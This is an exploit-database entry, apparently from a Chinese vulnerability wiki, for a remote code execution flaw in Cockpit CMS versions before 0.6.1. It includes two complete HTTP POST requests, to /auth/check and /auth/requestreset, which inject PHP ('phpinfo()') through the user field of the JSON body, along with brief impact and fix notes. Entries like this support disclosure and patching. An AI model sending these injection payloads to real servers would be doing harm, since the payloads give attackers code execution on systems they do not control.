免费、自由、人人可编辑的漏洞库
,
EXP
# Cockpit CMS 0.6.1 - Remote Code Execution # Product: Cockpit CMS (https://getcockpit.com) # Version: Cockpit CMS < 0.6.1 # Vulnerability Type: PHP Code Execution # Exploit Author: Rafael Resende # Attack Type: Remote # Vulnerability Description # Cockpit before 0.6.1 allows an attacker to inject custom PHP code and achieve Remote Command Execution via registerCriteriaFunction in lib/MongoLite/Database.php. Disclosed 2020-01-06. # Exploit Login POST /auth/check HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/json; charset=UTF-8 Content-Length: 52 Origin: https://example.com {"auth":{"user":"test'.phpinfo().'","password":"b"}} # Exploit Password reset POST /auth/requestreset HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/json; charset=UTF-8 Content-Length: 28 Origin: https://example.com {"user":"test'.phpinfo().'"} ## Impact Allows attackers to execute malicious codes to get access to the server. ## Fix Update to versions >= 0.6.1
PWNWIK.COM==免费、自由、人人可编辑的漏洞库